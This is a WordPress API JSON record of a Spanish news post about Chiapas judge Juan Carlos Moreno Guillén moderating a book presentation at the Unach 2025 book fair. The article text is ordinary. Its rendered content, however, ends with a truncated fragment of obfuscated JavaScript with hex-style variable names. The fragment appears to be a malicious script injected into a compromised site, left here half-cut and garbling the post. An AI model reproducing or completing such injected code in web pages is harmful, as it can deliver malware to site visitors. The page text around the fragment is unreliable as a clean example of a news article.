{"id":24510,"date":"2025-10-14T04:55:26","date_gmt":"2025-10-14T04:55:26","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24510"},"modified":"2025-10-14T04:55:26","modified_gmt":"2025-10-14T04:55:26","slug":"modera-juan-carlos-moreno-guillen-presentacion-de-libro","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24510","title":{"rendered":"Modera Juan Carlos Moreno Guill\u00e9n presentaci\u00f3n de libro"},"content":{"rendered":"\n<ul class=\"wp-block-list\">\n<li>Presente Poder Judicial en la Feria Internacional del Libro de la Unach 2025.<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"24511\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/IMG-20251013-WA0014-1024x682.jpg\" alt=\"\" class=\"wp-image-24511\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/IMG-20251013-WA0014-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/IMG-20251013-WA0014-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/IMG-20251013-WA0014-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/IMG-20251013-WA0014-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/IMG-20251013-WA0014.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>13 de octubre del 2025. Atendiendo a la invitaci\u00f3n realizada por la m\u00e1xima casa de estudios en Chiapas, el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, Juan Carlos Moreno Guill\u00e9n, particip\u00f3 como moderador en la presentaci\u00f3n del libro \u201cTribunal inc\u00f3modo: las reacciones (Backlash) a las sentencias de un tribunal constitucional\u201d, en el marco de la XII Feria Internacional del Libro Unach 2025.<\/p>\n\n\n\n<p>Este acto fue un espacio de an\u00e1lisis y reflexi\u00f3n en torno a este libro que aborda las reacciones de diversas \u00edndoles que tiene la sociedad en general, especialmente a trav\u00e9s de medios de comunicaci\u00f3n y redes sociales, sobre las resoluciones del Tribunal Electoral, centr\u00e1ndose en los casos m\u00e1s emblem\u00e1ticos.<\/p>\n\n\n\n<p>Desde su funci\u00f3n como moderador, el magistrado Moreno Guill\u00e9n destac\u00f3 que estas actividades impulsan y fortalecen en la sociedad una cultura jur\u00eddica, que fomenta el di\u00e1logo anal\u00edtico y el reconocimiento de la importante funci\u00f3n de las instituciones de justicia.<\/p>\n\n\n\n<p>En la presentaci\u00f3n se cont\u00f3 con la destacada presencia de la coordinadora de la obra, Alejandra Tello Mendoza, y de los coautores Oswaldo Chac\u00f3n Rojas y Cristian Iv\u00e1n Guti\u00e9rrez S\u00e1nchez, quienes compartieron su visi\u00f3n y enfoque en los temas que requieren una mirada m\u00e1s profunda desde el \u00e1mbito jur\u00eddico y acad\u00e9mico.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Presente Poder Judicial en la Feria Internacional del Libro de la Unach 2025. 13 de octubre del 2025. Atendiendo a la invitaci\u00f3n realizada por la m\u00e1xima casa de estudios en Chiapas, el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, Juan Carlos Moreno Guill\u00e9n, particip\u00f3 como moderador en la presentaci\u00f3n &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24511,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-24510","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24510","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24510"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24510\/revisions"}],"predecessor-version":[{"id":24512,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24510\/revisions\/24512"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24511"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24510"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24510"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24510"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}